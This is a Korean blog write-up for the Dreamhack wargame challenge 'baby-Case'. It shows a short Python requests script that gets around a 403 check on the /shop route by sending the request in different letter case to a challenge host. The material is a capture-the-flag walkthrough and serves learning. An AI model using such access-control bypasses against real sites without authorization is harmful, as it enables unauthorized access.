baby-Case 풀이
2024. 9. 16. 20:23ㆍDreamhack Wargame
728x90
두 가지 코드가 주어집니다.
app.js의 /shop 페이지를 보면 requests 데이터가 "FLAG"라면 403 에러를 반환해 주는 모습을 확인할 수 있습니다.
이 부분만 우회하면 될 것 같은데... 구글링 부터 해봤습니다.
https://www.hahwul.com/2021/10/08/bypass-403/
403 forbidden을 우회하는 4가지 방법들
때때로 보안 테스팅 시 WAF나 Application의 로직에 따라 403 Forbidden 으로 접근이 제한되는 경우가 있습니다. 보통은 백엔드의 처리 로직을 봐야 정확하게 우회할 수 있는 포인트를 잡겠지만, 몇가지
www.hahwul.com
위 블로그의 내용 중, 대소문자를 이용하여 우회하는 방법을 참고했습니다.
import requests
url = "http://host3.dreamhack.games:16439/"
data = {'leg' : 'flag'}
res = requests.post(url+'SHOP', data=data)
print(res.text)
728x90
'Dreamhack Wargame' 카테고리의 다른 글
| Switching Command 풀이 (PW = FLAG 앞 10글자) (0) | 2024.09.19 |
|---|---|
| youth-Case 풀이 (PW = FLAG 앞 10글자) (0) | 2024.09.18 |
| Pyramid 풀이 (PW = FLAG 앞 12글자) (0) | 2024.08.16 |
| Proton Memo 풀이 (PW = FLAG 앞 10글자) (0) | 2024.08.14 |
| Permpkin 풀이 (PW = FLAG 앞 11글자) (0) | 2024.08.10 |